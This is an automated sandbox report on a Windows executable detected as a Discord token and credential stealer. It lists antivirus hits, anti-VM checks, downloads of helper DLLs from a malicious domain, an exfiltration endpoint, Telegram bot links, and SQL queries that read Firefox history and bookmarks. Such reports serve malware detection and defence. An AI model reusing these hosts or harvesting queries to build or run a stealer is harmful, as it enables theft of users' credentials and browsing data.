Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dBvNa2pTbj

Overview

General Information

Sample Name:dBvNa2pTbj (renamed file extension from none to exe)
Analysis ID:662346
MD5:628e04a5c298a35bd396b74a42d237fe
SHA1:d90d76f790f1ad0ab95c3bd4bb4fb8dcada77691
SHA256:66a0c9b894ef78540ddf8b1909b3a227789df7bd4ddcdf5cb3aaf4098493c296
Infos:

Detection

Discord Token Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Discord Token Stealer
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
PE file has nameless sections
Found many strings related to Crypto-Wallets (likely being stolen)
PE file contains section with special chars
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • dBvNa2pTbj.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\dBvNa2pTbj.exe" MD5: 628E04A5C298A35BD396B74A42D237FE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: dBvNa2pTbj.exe PID: 6272JoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
      Process Memory Space: dBvNa2pTbj.exe PID: 6272JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: dBvNa2pTbj.exeVirustotal: Detection: 54%Perma Link
        Source: dBvNa2pTbj.exeMetadefender: Detection: 42%Perma Link
        Source: dBvNa2pTbj.exeReversingLabs: Detection: 84%
        Source: https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dllAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dllAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/EntityFramework.dllAvira URL Cloud: Label: malware
        Source: http://holdmy1337.gaAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/loading.txtAvira URL Cloud: Label: malware
        Source: https://holdmy1337.gaAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/ginzo.php?ownerid=Avira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dllAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.dllAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/Ionic.Zip.dllAvira URL Cloud: Label: malware
        Source: https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dllAvira URL Cloud: Label: malware
        Source: holdmy1337.gaVirustotal: Detection: 18%Perma Link
        Source: dBvNa2pTbj.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 136.243.172.101:443 -> 192.168.2.5:49765 version: TLS 1.2
        Source: dBvNa2pTbj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\symbols\exe\build.pdb source: dBvNa2pTbj.exe, 00000000.00000002.438636945.000000000B200000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: build.pdb source: dBvNa2pTbj.exe
        Source: Binary string: \??\C:\Windows\exe\build.pdbNw source: dBvNa2pTbj.exe, 00000000.00000003.432950977.000000000B22C000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: build.pdb\build.pdbp? source: dBvNa2pTbj.exe, 00000000.00000002.433315540.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /assets/dll/Ionic.Zip.dll HTTP/1.1Host: holdmy1337.gaConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /assets/dll/EntityFramework.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 136.243.172.101 136.243.172.101
        Source: Joe Sandbox ViewIP Address: 136.243.172.101 136.243.172.101
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RdnGRD1Gff6EJxZ%2FPmVbfBF6u8DRG7hKTNicZi%2F75lP2psYXR5XLNdBOePYko22idIS5qCzOdIWIWdcKbfBv%2BFBWKEtS9UU5340WpkZEn1XFv76N%2Fn4Eushv9YTp4oC3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5cab789c00-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MNmrc2sZmN8znbOriV2fmJZxcHLxd0d9wWLSWd6krtqlpwCn9Yl1q0WrvPWjAs%2FWXYgixGG%2FbIht7Y0c%2BCnVd1f5p82wmV71zW%2FFcz5f%2BRs1zEAjPTwFrzz%2BRqog63KB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5dfd1369a3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjXQl57cA4%2F6dF4cETbFWY%2F4dNp2yBM562bgDdk%2FBMq4e5P6Y0k4bEbJ%2F%2FJNnVV5iPZhfbIJ%2B8mpqCFdpUSxlAff80E9d7D24Bk18UtC8LBnBrpbUl3hwwY3fPa45%2BUM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5f0e8d8fdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G74D7K65x6MO7hvmX52vMqg7Yoo2eBcD6VtJEYqHN8cyznApMIp8nDFW3zU6Ko6z437bl5g06fuO94vI7K5EF%2FIEXZ%2FGDJwMO3kvqBMWogMpuMT98JfGHJYPyywCeJD1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a6018e59b8f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kZ%2FYZnv%2F58ow6idhGhK3hGeCvZAVvdl%2FMDDH9lIvFHgfEDqRiSQ%2FNWhMUPG7Elo2IsCMbL5BzlZdIHfG0UrQYItlD1K%2B4qQNJrSbONF0ngME74nhonPsPICAToz1K3b5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a60edb8909c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MIEjGYMh7ZMbaY6M7TJZ%2F5nlqZnNO4FhK5yZ8cPuAjfWwmMM7ylvcevS5bHLmh06iFqdDI%2Brt0y5WIGj2r0CKLSHXC7QAyCX9rIRoueqF49mMxryRVxvRUT176AAAFxw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a620bf6bb8f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z0PB9Cx3FfEPpYDL1D8eOtKTi0Ma5yQeA6UsjNwo6q7RKvW4z1TVkob37uL0WfFVdnv8gsYY5TL69HY0OBj2ICSMmcZNSIwpTM6wBXYYBsGv6WeFWLtAQFKRgMyb8BB1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a635b209bf4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A9gMCjWMzZvPKB7qd5b5rmk38GSs4%2FVK75C44pp0rZLAsia2bLN9QXNvmp6LlGKIBxDTcqqzcj9i%2BaF6n9lMZJiQ2BKRaPuuoW46ER4GZOrQ6w2klPhSBK0gTIvB7sfg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a647a896910-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: dBvNa2pTbj.exe, 00000000.00000002.434452190.0000000002F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://holdmy1337.ga
        Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
        Source: dBvNa2pTbj.exe, 00000000.00000003.433033972.000000000155C000.00000004.00000020.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.433983096.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
        Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435855400.0000000003197000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434661304.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435866825.00000000031A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/ch.svg
        Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/EntityFramework.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/Ionic.Zip.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/ginzo.php?ownerid=
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga/loading.txt
        Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.ga4
        Source: dBvNa2pTbj.exe, 00000000.00000002.434619814.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://holdmy1337.gaD8
        Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
        Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/?output=xml
        Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/?output=xmlx
        Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is4
        Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.drString found in binary or memory: https://t.me/ginzostealer_bot
        Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.drString found in binary or memory: https://t.me/holdthismoneybot
        Source: unknownDNS traffic detected: queries for: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/Ionic.Zip.dll HTTP/1.1Host: holdmy1337.gaConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /assets/dll/EntityFramework.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
        Source: global trafficHTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 136.243.172.101:443 -> 192.168.2.5:49765 version: TLS 1.2

        System Summary

        barindex
        Source: dBvNa2pTbj.exeStatic PE information: section name:
        Source: dBvNa2pTbj.exeStatic PE information: section name: X99^i@
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015320280_2_01532028
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0153251A0_2_0153251A
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015334380_2_01533438
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015318E80_2_015318E8
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01535AF10_2_01535AF1
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015351600_2_01535160
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015333FA0_2_015333FA
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0153A40F0_2_0153A40F
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0153A4200_2_0153A420
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0153049F0_2_0153049F
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015367300_2_01536730
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015347B80_2_015347B8
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015367A00_2_015367A0
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015356D00_2_015356D0
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_015348A80_2_015348A8
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01535BFB0_2_01535BFB
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01532BBD0_2_01532BBD
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01533D700_2_01533D70
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01534D200_2_01534D20
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01533C590_2_01533C59
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01535CAB0_2_01535CAB
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_01531F910_2_01531F91
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3973B80_2_0B3973B8
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B39A6280_2_0B39A628
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3926F00_2_0B3926F0
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3985400_2_0B398540
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398B790_2_0B398B79
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398B700_2_0B398B70
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B39896A0_2_0B39896A
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3989610_2_0B398961
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398FD60_2_0B398FD6
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398FCD0_2_0B398FCD
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398DB10_2_0B398DB1
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B398DA80_2_0B398DA8
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3973AA0_2_0B3973AA
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3912580_2_0B391258
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3912490_2_0B391249
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3987570_2_0B398757
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B39874E0_2_0B39874E
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3926E20_2_0B3926E2
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3985380_2_0B398538
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3975490_2_0B397549
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B39943A0_2_0B39943A
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeCode function: 0_2_0B3994430_2_0B399443
        Source: dBvNa2pTbj.exeBinary or memory string: OriginalFilename vs dBvNa2pTbj.exe
        Source: dBvNa2pTbj.exe, 00000000.00000002.433256734.0000000000B04000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebuild.exe" vs dBvNa2pTbj.exe
        Source: dBvNa2pTbj.exeBinary or memory string: OriginalFilenamebuild.exe" vs dBvNa2pTbj.exe
        Source: dBvNa2pTbj.exeStatic PE information: Section: X99^i@ ZLIB complexity 1.0003801884541985
        Source: dBvNa2pTbj.exeVirustotal: Detection: 54%
        Source: dBvNa2pTbj.exeMetadefender: Detection: 42%
        Source: dBvNa2pTbj.exeReversingLabs: Detection: 84%
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile read: C:\Users\user\Desktop\dBvNa2pTbj.exeJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile created: C:\Users\user\AppData\Local\g1nz0l1s7Jump to behavior
        Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@1/15@2/3
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places;
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places;The database that stores the Bookmarks could not be found:
        Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,type,fk,parent,position,title,keyword_id,folder_type,dateAdded,lastModified,guid,syncStatus,syncChangeCounter FROM moz_bookmarks+SELECT url FROM moz_places WHERE id = '{0}';The database that stores the Downloads could not be found: hSELECT id,place_id,anno_attribute_id,content,flags,expiration,type,dateAdded,lastModified FROM moz_annos
        Source: dBvNa2pTbj.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\dBvNa2pTbj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
